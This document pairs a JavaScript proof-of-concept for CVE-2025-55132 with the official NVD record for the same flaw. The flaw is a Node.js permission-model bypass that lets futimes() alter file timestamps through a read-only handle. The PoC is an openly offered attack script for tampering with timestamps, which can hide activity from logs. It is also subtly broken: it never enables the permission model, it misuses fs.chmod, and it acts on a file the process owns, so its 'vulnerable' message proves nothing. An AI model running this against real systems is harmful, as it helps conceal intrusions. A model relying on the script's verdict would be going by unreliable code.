CVE-2025-55132

// CVE-2025-55132 PoC - Node.js futimes() Permission Bypass const fs = require('fs'); const path = require('path'); // Setup: Create a read-only file to demonstrate the vulnerability const testFile = '/tmp/test_readonly_file.txt'; const targetDir = '/tmp/test_readonly_dir'; // Create test directory and file if (!fs.existsSync(targetDir)) { fs.mkdirSync(targetDir, { mode: 0o555 }); // Read-only directory } fs.writeFileSync(testFile, 'test content'); fs.chmod(testFile, 0o444); // Read-only file console.log('[+] Original timestamps:'); const originalStats = fs.statSync(testFile); console.log(' atime:', originalStats.atime); console.log(' mtime:', originalStats.mtime); // Simulate futimes() bypass using fs.open() with read-only flag // This demonstrates the vulnerability where futimes() bypasses write permission checks const newTime = new Date('2020-01-01T00:00:00Z'); try { // Open file with read-only flag const fd = fs.openSync(testFile, 'r'); // Attempt to modify timestamps using low-level fsync-like operation // In vulnerable versions, this succeeds even without write permissions fs.futimes(fd, newTime, newTime, (err) => { if (err) { console.log('[-] futimes() failed (expected in patched version)'); console.log(' Error:', err.message); } else { console.log('[+] futimes() succeeded (vulnerable!)'); const newStats = fs.statSync(testFile); console.log(' New atime:', newStats.atime); console.log(' New mtime:', newStats.mtime); } fs.closeSync(fd); }); } catch (e) { console.log('[-] Exception:', e.message); } // Cleanup setTimeout(() => { fs.unlinkSync(testFile); fs.rmdirSync(targetDir); }, 1000);

{"cve": {"id": "CVE-2025-55132", "sourceIdentifier": "[email protected]", "published": "2026-01-20T21:16:03.430", "lastModified": "2026-02-03T21:27:22.813", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw in Node.js's permission model allows a file's access and modification timestamps to be changed via `futimes()` even when the process has only read permissions. Unlike `utimes()`, `futimes()` does not apply the expected write-permission checks, which means file metadata can be modified in read-only directories. This behavior could be used to alter timestamps in ways that obscure activity, reducing the reliability of logs. This vulnerability affects users of the permission model on Node.js v20, v22, v24, and v25."}, {"lang": "es", "value": "Un fallo en el modelo de permisos de Node.js permite que las marcas de tiempo de acceso y modificación de un archivo sean modificadas a través de `futimes()` incluso cuando el proceso tiene solo permisos de lectura. A diferencia de `utimes()`, `futimes()` no aplica las comprobaciones de permisos de escritura esperadas, lo que significa que los metadatos del archivo pueden ser modificados en directorios de solo lectura. Este comportamiento podría ser utilizado para alterar las marcas de tiempo de maneras que oscurezcan la actividad, reduciendo la fiabilidad de los registros. Esta vulnerabilidad afecta a los usuarios del modelo de permisos en Node.js v20, v22, v24 y v25."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 2.8, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-276"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "versionStartIncluding": "20.0.0", "versionEndExcluding": "20.20.0", "matchCriteriaId": "A78B4AE9-C1B4-4DD0-9EDF-A3A60431B6DA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "versionStartIncluding": "22.0.0", "versionEndExcluding": "22.22.0", "matchCriteriaId": "132A7510-B3E9-4F85-9B61-A834B12DD7D7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "versionStartIncluding": "24.0.0", "versionEndExcluding": "24.13.0", "matchCriteriaId": "A83233BD-D901-4A1A-A3AF-0DC3E76CD2C0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "versionStartIncluding": "25.0.0", "versionEndExcluding": "25.3.0", "matchCriteriaId": "970EF154-D905-4FDA-85CB-C3AB08BEFAEC"}]}]}], "references": [{"url": "https://nodejs.org/en/blog/vulnerability/december-2025-security-releases", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}